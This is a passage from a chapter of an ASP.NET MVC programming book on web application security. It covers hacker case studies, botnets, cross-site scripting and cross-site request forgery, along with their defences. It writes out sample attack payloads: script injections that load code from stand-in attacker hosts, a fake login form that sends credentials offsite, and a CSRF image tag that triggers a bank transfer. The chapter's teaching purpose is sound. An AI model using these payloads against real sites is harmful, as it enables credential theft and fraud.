Chapter 9 - Securing Your Application -- Professional ASP.NET MVC 1.0


Overview

Let's face it: security isn't sexy. Most of the time when you read a chapter on security it's either underwritten or very, very overbearing. The good news for you is that the authors read these books, too — a lot of them — and we're quite aware that we're lucky to have you as a reader, and we're not about to abuse that trust. In short, we really want this chapter to be informative because it's very important!

This chapter is one you absolutely must read, as ASP.NET MVC doesn't have as many automatic protections as ASP.NET Web Forms does to secure your page against malicious users. To be perfectly clear: ASP.NET Web Forms tries hard to protect you from a lot of things. For example:

  • Server Components HTML-encode displayed values and attributes to help prevent XSS attacks.

  • View State is encrypted and validated to help prevent tampering with form posts.

  • Request Validation (@Page ValidateRequest="true") intercepts malicious-looking data and offers a warning (this is something that is still turned on by default with ASP.NET MVC).

  • Event Validation helps prevent against injection attacks and posting invalid values.

The transition to ASP.NET MVC means that handling some of these things falls to you — this is scary for some folks, a good thing for others.

If you're of the mind that a framework should "just handle this kind of thing" — well, we agree with you, and there is a framework that does just this: ASP.NET Web Forms, and it does it very well. It comes at a price, however, which is that you lose some control with the level of abstraction introduced by ASP.NET Web Forms (see Chapter 3 for more details). For some this price is negligible; for others it's a bit too much. We'll leave the choice to you — but before you make this decision, you should be informed, and that's what this chapter is all about — the things you'll have to do for yourself with ASP.NET MVC.

The number one excuse for insecure applications is a lack of information or understanding on the developer's part, and we'd like to change that — but we also realize that you're human and are susceptible to sleep. Given that, we'd like to offer you the punch line first, in what we consider to be the critical summary statements of this chapter:

  • Never, ever trust any data your users give you. Ever.

  • Any time you render data that originated as user input, HTML-encode it (or Attribute Encode it if it's displayed as an attribute value).

  • Don't try to sanitize your users' HTML input yourself (using a whitelist or some other method) — you'll lose.

  • Use HTTP-only cookies when you don't need to access cookies via client-side script (which is most of the time).

  • Strongly consider using the AntiXSS library (www.codeplex.com/AntiXSS)

There's obviously a lot more we can tell you — including how these attacks work and about the minds behind them. So hang with us — we're going to venture into the minds of your users, and, yes, the people who are going to try to hack your site are your users, too. You have enemies, and they are waiting for you to build this application of yours, so they can come and break into it. If you haven't faced this before, then it's usually for one of two reasons:

  • You haven't built an application.

  • You didn't find out someone hacked your application.

Hackers, crackers, spammers, viruses, malware — they want into your computer and the data inside it. Chances are that your e-mail filters have deflected many spam messages in the time that it's taken you to read this. Your ports have been scanned, and most likely an automated worm has tried to find its way into your PC through various operating system holes.

This may seem like a dire way to start this chapter; however, there is one thing that you need to understand straight off the bat: it's not personal. You're just not part of the equation. It's a fact of life that some people consider all computers (and their information) fair game; this is best summed up by the old story of the turtle and the scorpion, in which the scorpion begs the turtle for a ride across the river, promises not to sting, and then stings the turtle midstream anyway, simply because it's in his nature.

You and your application are surrounded by scorpions — each of them is asking for a ride.

 

 

This is a War

We're at war and have been ever since you plugged your first computer into the Internet. For the most part, you've been protected by spam filters and antivirus software, which fend off several attempted intrusions per hour.

When you decided to build a web application, the story became a little more dramatic. You've moved outside the walls of the keep and have ventured out toward the frontlines of a major, worldwide battle: the battle for information. It's your responsibility to keep your little section of the Great Wall of Good as clear of cracks as possible, so the hordes don't cave in your section.

This may sound drastic — perhaps even a little dramatic — but it's actually very true. The information your site holds can be used in additional hacks later on. Worse yet, your server or site can be used to further the evil that is junk mail or possibly to participate in a coordinated zombie attack.

Sun Tzu, as always, puts it perfectly:

"If you know both yourself and your enemy, you will win numerous battles without danger."

together with:

"All warfare is based on deception."

is where we will begin this discussion. The danger your server and information face doesn't necessarily come from someone on the other end of the line. It can come from perceived friends, sites that you visit often, or software you use routinely. Most security issues for users come from deception.

Knowing Your Enemy's Mind

If you've ever read a book about hackers and the hacker mentality, one thing quickly becomes apparent: there is no reason why they do it. Like the scorpion, it's in their nature. It's worth diving a bit deeper into these individuals, what they do, how they think, and the software they use to try to get at the information on your computer. The term Black Hat is used quite often to describe hackers who set out to explore and steal information "for the fun of it." White Hat hackers generally have the same skills, but put their talents to good use, creating Open Source software and generally trying to help.

The first thing to embrace is that the Black Hats are smarter than you and most likely know 10 times what you do about computer systems and networks. This may or may not be true — but if you assume this from the beginning, you're ahead of the game. There is a natural order of sorts at work here — an evolution of hackers who are refining their evil over time to become even more evil. The ones who have been caught are only providing lessons to the ones who haven't, making the ones left behind more capable and smarter than before. It's a vicious game and one that we're a long way from stopping.

Case Study: The Relentless Mischief of Kevin Poulsen

Kevin Poulsen has attained god status in the world of digital crimes. He started working with computers at a very young age and was quickly recognized as a teenage computer prodigy. During his twenties, Kevin "fell to the dark side," assuming the identity "Dark Dante," while terrorizing the local phone company, Pacific Bell.

Kevin was patient and driven, reportedly staying up for days at a time, learning everything he could about a system and its vulnerabilities. During the late 1980s, Kevin managed to completely map out the switching systems of Pacific Bell and commanded nearly all of the communication company's internal servers and network. The remarkable thing about this, however, is that Pacific Bell never knew of his presence.

On June 1, 1990, Kevin made his infiltration pay off. KIIS FM held a contest, wherein they were going to give away a brand new Porsche 944, valued at over $50,000, to the 102nd caller after a series of three songs was played. Kevin and his friends listened all day long and shortly after noon, the three songs were played, which sent Kevin and his friends into action.

Kevin was logged in to Pacific Bell's switching network, and he quickly disabled all the switches serving KIIS FM, except for those routing his and his friends' home phones. They picked up their phones and started to call. No one else, anywhere in the world, could make it through to KIIS FM, save for Kevin and friends, and they quickly racked up 101 calls in about 30 minutes. Kevin placed the 102nd call — winning the Porsche, while simultaneously resetting Pacific Bell's switching system back to its original state.

Kevin perpetrated various other crimes that quickly caught the attention of the federal authorities, and he soon was on the run. Earlier in his life, the government had been on to him as well, but instead of throwing him in jail, they decided to put the scorpion on their backs and hired him to make their systems more secure.

He worked diligently to make Pentagon systems more secure as well as those of other agencies, but, when he was off work, he would continue his life as Dark Dante. No one knows for sure, but it's been suggested that Kevin left himself a vast network of back doors and security holes in the government systems that he worked on. It has never been proven that he did this, but many people wonder how Kevin was able to remain a fugitive from the FBI for over 17 months — only to be caught with the help of the TV show America's Most Wanted.

Kevin is indicative of the curious genius that lit the fire of geek hackers in the 1970s and 1980s. His exploits may seem tame — consisting of little else than mischief and small-scale information crimes — but that may be only a function of the times.

One can only imagine what Kevin would have been capable of had he flexed his criminal genius today. It's safe to say that he would, most likely, have been a lot more low profile than to jam the phone lines to a radio station so that he could win a Porsche, and it's a safe bet that money would have been at the top of his mind.

If Kevin were prowling the Internet these days, you probably wouldn't have much to fear from him directly — in other words, he probably wouldn't be hacking your server to steal your code, for instance. If you were Kevin — if you had his phr34k sk1llz — what would you want from an online application? The answer is: something that will pay, with the least chance of getting caught. Usually, this comes in the form of user data: e-mail addresses and passwords, credit card numbers, and other sensitive information that your users trust you with.

The stealing of information is silent, and you most likely will never know that someone is (perhaps routinely) stealing your site's information — they don't want you to know. With that, you're at a disadvantage.

Information theft has supplanted curiosity as the motivator for hackers, crackers, and phreaks on the Web. It's big business.

Case Study: Ph34rs0m Sk1llz: DEFCON Capture the Flag

DEFCON is the world's largest hacker convention (yes, they have such things) and is held annually in Las Vegas. The audience is mainly computer security types (consultants, journalists, etc.), law enforcement (FBI, CIA, etc., who do not need to identify themselves), and coders who consider themselves to be on the fringe of computing.

A lot of business is done at the convention, as you can imagine, but there are also the obligatory "feats of technical strength" for the press to write about. One of these is called "Capture the Flag," which is also, coincidentally, a popular video game format. The goal of Capture the Flag (or "CTF") is for hacker teams to successfully compromise a set of specially configured servers. These aren't your typical servers — they are set up specifically to defend against such attacks and are configured specially for CTF by a world-renowned security specialist.

The servers (usually 12 or so) are set up with specific "vulnerabilities":

  • A web server

  • A text-based messaging system

  • A network-based optical character recognition system

The teams are unaware of what each server is equipped with when the competition begins.

The scoring is simple: one point is awarded for penetrating the security of a server. Penetrate them all, and you win. If a team doesn't win, the contest is called at the end of 48 hours, and the team with the most points takes the crown. Variations on the game include penetrating a server and then resetting its defenses in order to "secure it" against other teams. The team who holds the most servers at the end of the competition wins.

The teams that win the game state that discipline and patience are what ultimately makes the difference. Hacking the specially configured servers is not easy and usually involves coordinating attacks along multiple fronts, such as coaxing the web server to give up sensitive information, which can then be used in other systems on the server. The game is focused on knowing what to look for in each system, but the rules are wide open, and cheating is quite often encouraged, which usually takes the form of a more personal style of intrusion: social engineering.

Case Study: Deception and Hacking into the Server Room

At one DEFCON CTF, the reigning champion "Ghettohackers" were once again on their way to winning in a variation of the CTF format called "Root fu." In this format, you "root" your competition by placing a file called "flag.txt" in their "flag room" — usually their C drive or on a server somewhere in the game facility. You can gain points by rooting the main server (and winning) or by rooting your competition.

During this competition, one of the Ghettohackers team members smuggled in an orange hardhat with a reflective vest, and put it on with an electrician's utility belt. He then stood outside the server room (where the event was held) and waited for hotel staff to walk by. When a staff person eventually came by, the hacker impatiently asked if they were there to let him in and said that he was on a schedule and needed to get to a call upstairs.

Eventually he was let in by the hotel staff, and, looking at the diagram on the wall, he quickly figured out which machine was the "main box" — the server holding the main flag room. He pulled out his laptop and plugged it into the machine, quickly hacking his way onto the machine to win the game.

It doesn't take much to deceive people who like to help others — you just need to be evil — and give them a reason to trust you — and you're in.

Case Study: Social Engineering and Kevin Mitnick

Kevin Mitnick is widely regarded as the most prolific and dangerous hacker in U.S. history. Through various ruses, hacks, and scams he found his way into the networks of top communication companies as well as Department of Defense computer systems. He managed to steal a lot of very expensive code by using simple social engineering tricks, such as posing as a company employee or flat out asking employees for his lost password over the phone.

His plan was simple — take advantage of two basic laws about people:

  • We want to be nice and help others.

  • We usually leave responsibility to someone else.

In an interview with CNET, Kevin stated it rather bluntly:

"[Hackers] use the same methods they always have — using a ruse to deceive, influence or trick people into revealing information that benefits the attackers. These attacks are initiated, and in a lot of cases, the victim doesn't realize [it]. Social engineering plays a large part in the propagation of spyware. Usually, attacks are blended, exploiting technological vulnerabilities and social engineering."

Social engineering does not necessarily mean that someone is going to come up to you with a fake moustache and an odd-looking uniform, asking for access to your server. It could come in the form of a fake request from your ISP, asking you to log in to your server's web control panel to change a password. It may also be someone who befriends you online — perhaps wanting to help with a side project you're working on. The key to a good hack is patience, and often it only takes weeks to feel like you "know" someone. Eventually, they may come to know a lot about you and, more hazardously, about your clients and their sensitive information.

 
 

Weapons

As discussed previously, the key personal weapons for Black Hat attackers are:

  • Relentless patience

  • Ingenuity and resources

  • Social engineering skills

These are in no particular order — but they are essentially the three elements that underscore a successful hacker. No matter how much you may know about computers, you are up against someone who likely knows a lot more, and who has a lot more patience. He or she also knows how to deceive you.

The goal for these people is no longer mere exploration. Money is now the motivator, and there's a lot of it to be had if you're willing to be evil. Information stored in your site's database, and more likely the resources available on your machine, are the prizes of today's Black Hats.

Spam

If your system (home or server) is ever compromised, it's likely that it will be in the name of spam.

Spam needs no explanation or introduction. It is ubiquitous and evil, the scourge of the Internet. Whether it continues to be the source of so much evil on the Internet is, however, something within our control. If you're wondering why people bother doing it (since spam blocking is fairly effective these days), it turns out that spamming is surprisingly effective — for the cost.

Spamming is essentially free, given how it's carried out. According to one study, usually only 1 in 10 million receivers of spam e-mail "follow through" and click an ad. The cost of sending those 10 million e-mails is close to 0, so it's immediately profitable. To make money, however, the spammers need to up their odds, so more e-mails are sent. Currently, the Messaging Anti-Abuse Workgroup (MAAWG, 2007) estimates that 90 percent (or more) of the e-mail sent on the Internet is spam, and a growing percentage of that e-mail links to or contains viruses that help the spam network grow itself. This self-growing, automated network of zombie machines (machines infected with a virus that puts them under remote control) is what's called a botnet. Spam is never sent from a central location — it would be far too easy to stop its proliferation in that case.

Most of the time a zombie virus will wait until you've logged out for the evening, and will then open your ports, disguise itself from your network and antivirus software, and start working its evil. It's likely you will never know this is happening, until you are contacted by your ISP, who has begun monitoring the traffic on your home computer or server, wondering why you send so many e-mails at night.

Much of the e-mail that is sent from a zombie node contains links that further the virus's own spread. These links are less about advertising and more about deceit and trickery, using tactics such as "Stupid Theme" subject lines, which tell people they have been videotaped naked or have won a prize in a contest. When the user clicks the link, they are redirected to a site (which could be yours!) that downloads the virus to their machine. These "zombie hosts" are often well-meaning sites (like yours!) that don't protect against cross-site scripting (XSS) or that allow malicious ads to be served — we cover this later in the chapter.

As of today, the "lone gunmen" hackers like Poulsen and Mitnick have been replaced by digital militias of virus builders, all bent on propagating global botnets.

Case Study: Profiting from Evil with the Srizbi and Storm Botnets

There is a great chance that you've had the Srizbi, Kraken, or Storm Trojans on a computer that you've worked on (server or desktop). These Trojans are so insidious and pervasive that Wikipedia credits them with sending over 90 percent of the world's spam. Currently, the botnet that is controlled by these Trojans is estimated to be around 1,500,000 computers and servers and is capable of sending up to 100 billion messages a day.

The Storm Worm

In September of 2007, the FBI declared that the Storm botnet was both sophisticated and powerful enough to force entire countries offline. Some have argued, however, that trying to compute the raw power of these botnets is missing the point, and some have suggested the comparison is like comparing "an army of snipers to the power of a nuclear bomb."

The Storm network has propagated, once again, largely due to social engineering and provocative e-mailing, which entices users to click on a link that navigates them to an infected web site (which could be yours!). To stay hidden, the servers that deliver the virus re-encode the binary file so that a "signature" changes, which defeats the antivirus and malware programs running on most machines.

These servers are also able to avoid detection, as they can rapidly change their DNS entries — sometimes minutes apart, making these servers almost untraceable.

The Srizbi Trojan

Srizbi is pure evil, and you've likely visited a web site that has tried to load it onto your computer. It is propagated using "MPack," a commercially available malware kit written in PHP. That's right, you can purchase software with the sole purpose of spreading viruses. In addition to that, you can ask the developers of MPack to help you make your code undetectable by various antivirus and malware services.

MPack is implemented using an iFrame, which embeds itself on a page (out of sight) and calls back to a main server, which loads scripts into the user's browser. These scripts detect which type of browser the user is running and what vulnerabilities the scripts can exploit. It's up to the malware creator to read this information and plant his or her evil on your computer.

Because MPack works in an iFrame, it is particularly effective against sites that don't defend very well against XSS. An attacker can plant the required XSS code on an innocent web site (like yours!) and, thus, create a propagation point, which then infects thousands of other users.

The worm itself has been analyzed by security experts worldwide, and most agree that the elegance and efficiency of the code is genius. For its size, the application packs a massive punch and is capable of a vast array of functionality, including sending e-mails, seeking out and downloading instructions, hiding from every known antivirus program, and performing various feats of system trickery.

Srizbi runs in kernel mode (capable of running with complete freedom at the core operating system level, usually unchecked and unhindered) and will actually take command of the operating system, effectively pulling a "Jedi mind trick" by telling the machine that it's not really there. One of these tricks is to actually alter the NTFS file system drivers, making itself completely unrecognizable as a file and rendering itself invisible. In addition to this, Srizbi is also able to manipulate the infected system's TCP/IP instructions, attaching directly to the drivers and manipulating them so that firewalls and network sniffers will not see it. Very evil.

The hallmark of Srizbi is its silence and stealth. All of the estimates for infection that we've suggested here are just that — estimates. No one knows the real numbers of infected machines.

Digital Stealth Ninja Network

Many FBI officials fear that these vast botnets will be used to attack power grids or government web sites, or worse yet, will be used in denial of service (DoS) attacks on entire countries. Matt Sergeant, a security analyst at MessageLabs, postulates:

"In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just two million of its machines. It's very frightening that criminals have access to that much computing power, but there's not much we can do about it." It is estimated that only 10-20 percent of the total capacity and power of the Storm botnet is currently being used."

One has to wonder at the capabilities of these massive networks, and why they aren't being used for more evil purposes, such as attacking governments or corporations that don't meet with some agenda (aka digital terrorism). The only answer that makes sense is that they are making money from what they are doing, and are run by people who want to keep making money and who also want to stay out of sight. This can change, of course, but for now, know that you can make a difference in this war. You can help by knowing your vulnerabilities as the developer of your site and possible caretaker of your server.

The rest of this chapter is devoted to helping you do this within the context of ASP.NET MVC.

 
 

Threat: Cross-Site Scripting (XSS)

You have allowed this attack before and maybe you just got lucky and no one walked through the unlocked door of your bank vault. Even if you're the most zealous security nut, you've let this one slip — as we discussed previously, the Black Hats of this world are remarkably cunning, and they work harder and longer at doing evil than you work at preventing it. It's unfortunate, as cross-site scripting (XSS) is the number one web site security vulnerability on the Web, and that's largely because web developers are unfamiliar with the risks (and hopefully, if you've read the previous sections, you're not one of them!).

XSS can be carried out in one of two ways: by a user entering nasty script commands into a web site that accepts "unsanitized" user input or by user input being directly displayed on a page. The first example is called "Passive Injection" — whereby a user enters nastiness into a textbox, for example, and that script gets saved into a database and redisplayed later. The second is called "Active Injection" and involves a user entering nastiness into an input, which is immediately displayed on screen. Both are evil — let's take a look at Passive Injection first.

Passive Injection

XSS is carried out by "injecting" script code into a site that accepts user input. An example of this is a blog, which allows you to leave a comment to a post, as shown in Figure 9-1.

Figure 9-1

This has four text inputs: name, e-mail, comment, and URL if you have a blog of your own. Forms like this make XSS hackers salivate for two reasons — first, they know that the input submitted in the form will be displayed on the site, and second, they know that encoding URLs can be tricky, and developers usually will forgo checking these properly since they will be made part of an anchor tag anyway.

One thing to always remember (if we haven't overstated it already) is that the Black Hats out there are a lot craftier than you are. We won't say they're smarter, but you might as well think of them this way — it's a good defense.

The first thing an attacker will do is see if the site will encode certain characters upon input. It's a safe bet that the comment field is protected and probably so is the name field, but the URL field smells ripe for injection. To test this, you can enter an innocent query, like the one in Figure 9-2.

Figure 9-2

It's not a direct attack, but you've placed a "less than" sign into the URL; what you want to see is if it gets encoded to &lt;, which is the HTML replacement character for "<". If you post the comment and look at the result, all looks fine (see Figure 9-3).

Figure 9-3

There's nothing here that suggests anything is amiss. But we've already been tipped off that injection is possible — there is no validation in place to tell you that the URL you've entered is invalid! If you view the source of the page, your XSS ninja hacker reflexes get a rush of adrenaline because right there, plain as day, is very low-hanging fruit:

<a href=" No blog! Sorry :<">Rob Conery</a>

This may not seem immediately obvious, but take a second and put your Black Hat on, and see what kind of destruction you can cause. See what happens when you enter this:

"><iframe src=" http://haha.juvenilelamepranks.example.com" height="400" width=500/>

This entry closes off the anchor tag that is not protected and then forces the site to load an iFrame, as shown in Figure 9-4.

Figure 9-4

This would be pretty silly if you were out to hack a site because it would tip off the site's administrator and a fix would quickly be issued. No, if you were being a truly devious Black Hat Ninja Hacker, you would probably do something like this:

"></a><script src=" http://srizbitrojan.evilzombiedeathvirus.example.com"></script> <a href="

This line of input would close off the anchor tag, inject a script tag, and then open another anchor tag so as not to break the flow of the page. No one's the wiser (see Figure 9-5).

Figure 9-5

Even when you hover over the name in the post you won't see the injected script tag — it's an empty anchor tag!

Active Injection

Active XSS injection involves a user sending in malicious information that is immediately shown on the page and is not stored in the database. The reason it's called "Active" is that it involves the user's participation directly in the attack — it doesn't sit and wait for a hapless user to stumble upon it.

You might be wondering how this kind of thing would represent an attack. It seems silly, after all, for users to pop up JavaScript alerts to themselves or to redirect themselves off to a porn site using your site as a graffiti wall — but there are definitely reasons for doing so.

Consider the "search this site" mechanism, found on just about every site out there. Most site searches will return a message saying something to the effect of "Your search for ‘XSS Attack!' returned X results:"; Figure 9-6 shows one from Rob's blog.

Figure 9-6

Most of the time this message is not HTML-encoded. The general feeling here is that if the user wants to play XSS with themselves, let them. The problem comes in when you enter the following text into a site that is not protected against Active Injection (using a Search box, for example):

"<br><br>Please login with the form below before proceeding:<formaction=" mybadsite.aspx"><table><tr><td>Login:</td><td><input type=text length=20name=login></td></tr><tr><td>Password:</td><td><input type=text length=20name=password></td></tr></table><input type=submit value=LOGIN></form>"

This little bit of code (which can be extensively modified to mess with the search page) will actually output a login form on your search page that submits to an offsite URL. There is a site built to demonstrate this vulnerability (the people at Acunetix created it intentionally to show how Active Injection works), and if you load the above term into its search form, it renders Figure 9-7.

Figure 9-7

You could have spent a little more time with the site's CSS and format to get this just right, but even this basic little hack is amazingly deceptive. If a user were to actually fall for this, they would be handing the attacker their login information!

The basis of this attack is our old friend, social engineering:

"Hey look at this cool site with naked pictures of you! You'll have to log in — I protected them from public view"

The link would be this:

<a href=" http://testasp.acunetix.com/Search.asp?tfSearch= <br><br>Please loginwith theform below before proceeding:<formaction=" mybadsite.aspx"><table><tr><td>Login:</td><td><input type=text length=20name=login></td></tr><tr><td>Password:</td><td><input type=text length=20name=password></td></tr></table><input type=submit value=LOGIN></form>">look atthis coolsite with naked pictures</a>

There are plenty of people falling for this kind of thing every day, believe it or not.

Preventing XSS

XSS can be avoided most of the time by using simple HTML encoding — the process by which the server replaces HTML reserved characters (like < and >) with "codes." You can do this with ASP.NET MVC in the View simply by using Html.Encode or Html.AttributeEncode for attribute values. Implementing this in Oxite means changing one small line of code, which the team has done already.
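As a minimal sketch of what that looks like in a view (the ViewData keys here are hypothetical placeholders for values that originated as user input):

<%-- HTML-encode user text before writing it into the page body --%>
<p><%= Html.Encode(ViewData["comment"]) %></p>

<%-- Attribute-encode user text before writing it into an attribute value --%>
<img src="screenshot.png" alt="<%= Html.AttributeEncode(ViewData["caption"]) %>" />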

If you get only one thing from this chapter, please let it be this: every bit of output on your pages should be HTML-encoded or HTML-attribute-encoded. We said this at the top of the chapter, but we'd like to say it again: Html.Encode is your best friend.

It's worth mentioning at this point that ASP.NET Web Forms guides you into a system of using server controls and postback, which, for the most part, tries to prevent XSS attacks. Not all server controls protect against XSS (Labels and Literals for example), but the overall Web Forms package tends to push people in a safe direction.

ASP.NET MVC offers you more freedom — but it also allows you some protections out of the box. Using the HtmlHelpers, for example, will encode your HTML as well as encode the attribute values for each tag. In addition, you're still working within the Page model, so every request is validated unless you turn this off manually.

But you don't need to use any of these things to use ASP.NET MVC. You can use an alternate ViewEngine and decide to write HTML by hand — this is up to you, and that's the point. This decision, however, needs to be understood in terms of what you're giving up, which are some automatic security features.

Html.AttributeEncode and Url.Encode

Most of the time it's the HTML output on the page that gets all the attention; however, it's important to also protect any attributes that are dynamically set in your HTML. In the original example shown previously, we showed you how the author's URL can be spoofed by injecting some malicious code into it. This was accomplished because the sample outputs the anchor tag like this:

<a href="<%=Url.Action(AuthorUrl)%>"><%=AuthorUrl%></a>

To properly sanitize this link, you need to be sure to encode the URL that you're expecting. This replaces reserved characters in the URL with escaped equivalents (a space becomes %20, for example).
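Applied to the anchor tag above, a sketch of the safer version (assuming AuthorUrl holds the raw value the user typed in) would be:

<a href="<%= Url.Encode(AuthorUrl) %>"><%= Html.Encode(AuthorUrl) %></a>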

You might also have a situation where you're passing a value through the URL based on what the user input somewhere on your site:

<a href="<%=Url.Action("index"," home",new {name=ViewData["name"]})%>>Click here</a>

If the user is evil, he could change this name to:

"></a><script src=" http://srizbitrojan. evilzombiedeathvirus.example.com"></script> <ahref="

And then pass that link on to unsuspecting users. You can avoid this by using encoding with Url.Encode or Html.AttributeEncode:

<a href="<%=Url.Action("index"," home",new{name=Html.AttributeEncode(ViewData["name"])})%>>Click here</a>

or

<a href="<%=Url.Encode(Url.Action("index"," home",new {name=ViewData["name"]}))%>>Clickhere</a>

Bottom line: never, ever trust any data that your user can somehow touch or use. This includes any form values, URLs, cookies, or personal information received from third-party sources such as Open ID. And encode everything you possibly can.

 
 

Threat: Cross-Site Request Forgery

A cross-site request forgery (CSRF pronounced "C-surf" but also known by the acronym XSRF) attack can be quite a bit more potent than simple cross-site scripting, discussed earlier. To fully understand what CSRF is, let's break it into its parts: XSS plus a confused deputy.

We've already discussed XSS, but the term "confused deputy" is new and worth discussing. Wikipedia describes a confused deputy attack as:

"A confused deputy is a computer program that is innocently fooled by some other party into misusing its authority. It is a specific type of privilege escalation."

In this case that deputy is your browser, and it's being tricked into misusing its authority in representing you to a remote web site. To illustrate this, we've worked up a rather silly yet annoying example.

Suppose that you work up a nice site that lets users log in and out and do whatever it is your site lets them do. The Login action lives in your Account Controller, and you've decided that you'll keep things simple and extend the AccountController to include a Logout action as well, which will forget who the user is:

public ActionResult Logout()
{
    FormsAuth.SignOut();
    return RedirectToAction("Index", "Home");
}

Now, suppose that your site allows limited whitelist HTML (a list of acceptable tags or characters that might otherwise get encoded) to be entered as part of a comment system (maybe you wrote a forums app or a blog) — most of the HTML is stripped or sanitized, but you allow images because you want users to be able to post screen shots.

One day, a nice person adds this image to their comment:

<img src="/account/logout" />

Now, whenever anyone visits this page, they are logged out of the site. Again, this isn't necessarily a CSRF attack, but it shows how some trickery can be used to coax your browser into making a GET request without your knowing about it. In this case, the browser did a GET request for what it thought was an image — instead it called the logout routine and passed along your cookie. Boom — confused deputy.

This attack works because of the way the browser works. When you log in to a site, information is stored in the browser as a cookie. This can be an in-memory cookie (a "session" cookie) or it can be a more permanent cookie written to file. Either way the browser tells your site that it is indeed you, making the request.

This is at the core of CSRF — the ability to use XSS plus a confused deputy (and a sprinkle of social engineering, as always) to pull off an attack on one of your users. Unfortunately, CSRF happens to be a vulnerability that not many sites have prevention measures for (we'll talk about these in just a minute).

Let's up the stakes a bit and work up a real CSRF example, so put on your Black Hats and see what kind of damage you can do with your favorite massively public, unprotected website. We won't use real names here — so let's call this site "Big Massive Site."

Right off the bat, it's worth noting that this is an odds game that you, as Mr. Black Hat, are playing with Big Massive Site's users. There are ways to increase these odds, which are covered in a minute, but straight away the odds are in your favor because Big Massive Site has upwards of 50 million requests per day.

Now it comes down to the Play — finding out what you can do to exploit Big Massive Site's security hole: the inclusion of linked comments on their site. In surfing the Web and trying various things, you have amassed a list of "Widely Used Online Banking Sites" that allow transfers of money online as well as the payment of bills. You've studied the way that these Widely Used Online Banking Sites actually carry out their transfer requests, and one of them offers some serious low-hanging fruit — the transfer is identified in the URL:

http://www.widelyusedbank.example.com?function=transfer&amount=1000&toaccountnumber=23234554333&from=checking

Granted, this may strike you as extremely silly — what bank would ever do this? Unfortunately the answer to that question is "too many," and the reason is actually quite simple — web developers trust the browser far too much, and the URL request that you're seeing above is leaning on the fact that the server will validate the user's identity and account using information from a session cookie. This isn't necessarily a bad assumption — the session cookie information is what keeps you from logging in for every page request! The browser has to remember something!

There are still some missing pieces here, and for that you need to use a little social engineering! You pull your Black Hat down a little tighter and log in to Big Massive Site, entering this as a comment on one of the main pages:

"Hey did you know that if you're a Widely Used Bank customer the sum of the digits of your account number add up to 30? It's true! Have a look: http://www.widelyusedbank.example.com"

You then log out of Big Massive Site and log back in with a second, fake account, leaving a comment following the "seed" above as the fake user with a different name:

"OMG you're right! How weird!<img src ="http://widelyusedbank.example.com?function=transfer&amount=1000&toaccountnumber=23234554333&from=checking" />.

The game here is to get Widely Used Bank customers to go log in to their account and try to add up their numbers. When they see that it doesn't work, they head back over to Big Massive Site to read the comment again (or they leave their own saying it doesn't work).

Unfortunately, for Perfect Victim, their browser still has their login session stored in memory — they are still logged in! When they land on the page with the CSRF attack, a request is sent to the bank's web site (where they are not ensuring that you're on the other end), and bam, Perfect Victim just lost some money.

The image in the comment (with the CSRF link) will just be rendered as a broken red X, and most people will think it's just a bad avatar or emoticon. What it really is, however, is a remote call to a page that uses GET to run an action on a server — a confused deputy attack that nets you some cold cash. It just so happens that the browser in question is Perfect Victim's browser — so it isn't traceable to you (assuming that you've covered your behind with respect to fake accounts in the Bahamas, etc.). This is almost the perfect crime!

This attack isn't restricted to simple image tag/GET request trickery; it extends well into the realm of spammers who send out fake links to people in an effort to get them to click to go to their site (as with most bot attacks). The goal with this kind of attack is to get users to click the link, and when they land on the site, a hidden iFrame or bit of script auto-submits a form (using HTTP POST) off to a bank, trying to make a transfer. If you're a Widely Used Bank customer and have just been there, this attack will work.

Revisiting the previous forum post social engineering trickery — it only takes one additional post to make this latter attack successful:

"Wow! And did you know that your Savings account number adds up to 50! This is so weird — read this news release: <a href="http://badnastycsrfsite.example.com">CNN.com</a> about it — it's really weird!"

Clearly you don't even need to use XSS here — you can just plant the URL and hope that someone is clueless enough to fall for the bait (going to their Widely Used Bank account and then heading to your fake page at http://badnastycsrfsite.example.com).

Preventing CSRF Attacks

You might be thinking that this kind of thing should be solved by the framework — and it is! ASP.NET MVC puts the power in your hands, so perhaps a better way of thinking about this is that ASP.NET MVC should enable you to do the right thing, and indeed it does!

Token Verification

ASP.NET MVC includes a nice way of preventing CSRF attacks, and it works on the principle of verifying that the user who submitted the data to your site did so willingly. The simplest way to do this is to embed a hidden input into each form request that contains a unique value. You can do this with the HTML Helpers by including this in every form:

<form action="/account/register" method=" post"><%=Html.AntiForgeryToken()%>…</form>

Html.AntiForgeryToken will output an encrypted value as a hidden input:

<input type=" hidden" value="012837udny31w90hjhf7u">

This value will match another value that is stored as a session cookie in the user's browser. When the form is posted, these values will be matched using an ActionFilter:

[ValidateAntiForgeryToken]
public ActionResult Register(…)

This will handle most CSRF attacks — but not all of them. In the last example above, you saw how users can be registered automatically to your site. The anti-forgery token approach will take out most CSRF-based attacks on your Register method, but it won't stop the "bots" out there that seek to auto-register (and then spam) users to your site. We'll talk about ways to limit this kind of thing later in the chapter.

GETs Don't Change Stuff

Bad grammar for sure — but, in general, a good rule of thumb is that you can prevent a whole class of CSRF attacks by only "changing" things in your DB or on your site by using POST. This means Registration, Logout, Login, and so forth. At the very least, this limits the confused deputy attacks somewhat.
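As a sketch of what that means in practice, the earlier Logout action can be restricted to POST with the MVC 1.0 AcceptVerbs attribute, so the <img src="/account/logout" /> trick no longer triggers it:

// Only a POST can reach this action now; a GET (such as one forced by an image tag) returns a 404
[AcceptVerbs(HttpVerbs.Post)]
public ActionResult Logout()
{
    FormsAuth.SignOut();
    return RedirectToAction("Index", "Home");
}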

HttpReferrer Validation

This can be handled using an ActionFilter (see Chapter 8), wherein you check to see if the client that posted the form values was indeed your site:

public class IsPostedFromThisSiteAttribute : AuthorizeAttribute
{
    public override void OnAuthorization(AuthorizationContext filterContext)
    {
        if (filterContext.HttpContext != null)
        {
            if (filterContext.HttpContext.Request.UrlReferrer == null)
                throw new System.Web.HttpException("Invalid submission");

            if (filterContext.HttpContext.Request.UrlReferrer.Host != "mysite.com")
                throw new System.Web.HttpException("This form wasn't submitted from this site!");
        }
    }
}

You can then use this filter on the Register method, like so:

[IsPostedFromThisSite]
public ActionResult Register(…)

As you can see there are different ways of handling this — which is the point of MVC. It's up to you to know what the alternatives are and to pick one that works for you and your site.

 
 

Threat: Cookie Stealing

Cookies are one of the things that make the Web usable. Without them, life becomes login box after login box. You can disable cookies on your browser to minimize the theft of your particular cookie (for a given site), but chances are you'll get a snarky warning that "Cookies must be enabled to access this site."

There are two types of cookies:

  • Session cookies are stored in the browser's memory and are transmitted via the header during every request.

